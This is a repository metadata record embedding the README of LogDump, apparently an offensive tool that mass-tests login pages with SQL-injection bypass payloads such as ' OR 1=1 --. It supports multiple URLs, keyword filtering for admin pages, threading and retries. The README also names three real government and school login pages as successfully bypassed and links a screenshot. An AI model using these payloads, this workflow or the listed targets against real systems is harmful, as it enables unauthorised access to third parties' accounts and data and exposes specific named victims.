{"id":23629638,"url":"https://github.com/hackfutsec/logdump","last_synced_at":"2025-07-31T02:34:54.689Z","repository":{"id":269964648,"uuid":"908977482","full_name":"HackfutSec/LogDump","owner":"HackfutSec","description":"This program automates SQL injection testing on login pages by sending payloads, logging results, and supporting both single and multiple URL tests with concurrency and retry logic.","archived":false,"fork":false,"pushed_at":"2024-12-27T14:00:34.000Z","size":118,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-12-27T14:21:17.749Z","etag":null,"topics":["injection","logging","login","logininjection","loginjection","sql","sqlinjection","sqlite","sqlite3","sqlogininjection"],"latest_commit_sha":null,"homepage":"https://github.com/HackfutSec/LogDump.git","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/HackfutSec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-12-27T12:46:43.000Z","updated_at":"2024-12-27T14:00:37.000Z","dependencies_parsed_at":"2024-12-27T14:21:19.448Z","dependency_job_id":"40fbc208-177f-44da-9a93-ca022ca77216","html_url":"https://github.com/HackfutSec/LogDump","commit_stats":null,"previous_names":["hackfutsec/logdump"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackfutSec%2FLogDump","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackfutSec%2FLogDump/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackfutSec%2FLogDump/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackfutSec%2FLogDump/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/HackfutSec","download_url":"https://codeload.github.com/HackfutSec/LogDump/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":239546892,"owners_count":19657045,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["injection","logging","login","logininjection","loginjection","sql","sqlinjection","sqlite","sqlite3","sqlogininjection"],"created_at":"2024-12-28T01:16:28.772Z","updated_at":"2025-02-18T20:36:42.913Z","avatar_url":"https://github.com/HackfutSec.png","language":"Python","readme":"# LogDump\n\n**LogDump** is an automated SQL injection testing tool designed to test login pages for vulnerabilities. It sends injection payloads into the username and password fields to check for potential security flaws. The tool supports both single URL testing and testing multiple URLs from a file, with logging, retry mechanisms, and multi-threading for improved performance.\n# Vuln Link:\n              Login found: http://ptsp.pt-nad.go.id/aipda/page/login.php with payload: ' OR 1=1 -- - ' or 1=1 limit 1 -- -+\n              Login found: https://www.eapus.pn-sinabang.go.id/login.php with payload: ' OR 1=1 -- - ' or 1=1 limit 1 -- -+\n              Login found: https://flipbook.smpn1blimbingsari.sch.id/login.php with payload: ' OR 1=1 -- - ' or 1=1 limit 1 -- -+\n\n# Login Found Pict:\n                    https://i.postimg.cc/k4dYyBT0/logon.png\n              \n              \n## Features\n\n- **Automated SQL Injection Testing:** Test login pages with a variety of payloads to check for vulnerabilities.\n- **Single URL Testing:** Test one URL at a time.\n- **Multiple URL Testing:** Test multiple URLs from a file, with optional URL filtering based on keywords.\n- **Logging:** Logs results of successful and failed injection attempts into separate log files.\n- **Exponential Backoff Retry:** Automatically retries failed requests with an increasing delay.\n- **Multi-threading:** Performs concurrent tests on multiple URLs and payloads for faster results.\n- **Customizable Fields:** Allows customization of the username and password field names.\n\n## Installation\n\n1. Clone the repository:\n\n   ```bash\n   git clone https://github.com/HackfutSec/LogDump.git\n   ```\n\n2. Navigate to the project directory:\n\n   ```bash\n   cd LogDump\n   ```\n\n3. Install the required dependencies:\n\n   ```bash\n   pip install -r requirements.txt\n   ```\n\n   If you don't have a `requirements.txt`, you can install the required libraries manually:\n\n   ```bash\n   pip install requests\n   ```\n\n## Usage\n\n### 1. Test a Single URL\n\nTo test a single login URL, run the program and provide the URL when prompted:\n\n```bash\npython logdump.py\n```\n\nYou will be asked to enter:\n\n- **Username field name** (default: `username`)\n- **Password field name** (default: `password`)\n- **URL** to test\n\nThe program will attempt to bypass the login using a series of payloads and log the results.\n\n### 2. Test Multiple URLs from a File\n\nTo test multiple URLs, the program will ask for the path to a file containing the URLs you want to test.\n\n- URLs will be filtered based on keywords you provide (optional).\n- The results will be logged and saved in the `results.txt` file.\n\n```bash\npython logdump.py\n```\n\nWhen prompted, enter:\n\n- **File path** containing URLs to test.\n- **Keywords** to filter URLs (optional).\n\n### Logs\n\n- **`success_injections.log`**: Logs successful injection attempts.\n- **`error_injections.log`**: Logs errors or failed attempts.\n- **`test_injections.log`**: General logs, including retries and requests.\n\nThe results of successful logins are also saved in a text file (`results.txt`).\n\n### Custom Payloads\n\nYou can add custom payloads by editing the `payloads.json` file. This file should contain a list of payload strings, such as:\n\n```json\n[\n    \"' OR 1=1 --\",\n    \"' OR 'a'='a\",\n    \"' OR 1=1#\"\n]\n```\n\n## Configuration\n\nYou can customize the program by modifying the following parameters:\n\n- **Username field name** and **Password field name**: Set default field names for the login form (default: `username`, `password`).\n- **Payload file**: The default payload file is `payloads.json`. You can replace or modify it to suit your needs.\n\n## Example\n\n### Running the program with a single URL:\n\n```bash\n$ python logdump.py\nEnter the URL to test (e.g., http://example.com/login.php): http://example.com/login.php\nEnter the username field name (default 'username'): \nEnter the password field name (default 'password'): \nTesting with payload: ' OR 1=1 --\nTesting with payload: ' OR 'a'='a\nLogin found with payload: ' OR 1=1 -- on URL http://example.com/login.php\nLogin found: http://example.com/login.php with payload: ' OR 1=1 --\n```\n\n### Running the program with multiple URLs from a file:\n\n```bash\n$ python logdump.py\nEnter the path to the file containing the URLs to test: urls.txt\nEnter the keywords to filter URLs (separated by commas): admin,login\n```\n\n## Logging\n\n- **Success logs**: All successful injection attempts are logged in `success_injections.log`.\n- **Error logs**: Errors, such as network issues or invalid responses, are logged in `error_injections.log`.\n- **General logs**: General information, including retries, are stored in `test_injections.log`.\n\n## Dependencies\n\n- `requests`: A simple HTTP library for making requests.\n- `concurrent.futures`: For multi-threading to run tests concurrently.\n\n## Contributing\n\nContributions are welcome! Feel free to fork the repository, open issues, and submit pull requests.\n\n### Steps to Contribute:\n\n1. Fork this repository.\n2. Create a new branch (`git checkout -b feature-name`).\n3. Make your changes.\n4. Commit your changes (`git commit -am 'Add new feature'`).\n5. Push to the branch (`git push origin feature-name`).\n6. Create a pull request.\n\n## License\n\nThis project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackfutsec%2Flogdump","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackfutsec%2Flogdump","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackfutsec%2Flogdump/lists"}